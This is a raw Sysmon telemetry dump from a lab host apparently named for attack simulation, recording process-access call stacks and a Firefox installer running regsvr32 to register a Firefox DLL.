13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+57f3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+1eeb|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 154100x800000000000000016134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.920{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXE"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Mozilla Firefox\AccessibleMarshal.dll"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe.\setup.exe /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.ini 10341000x800000000000000016133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows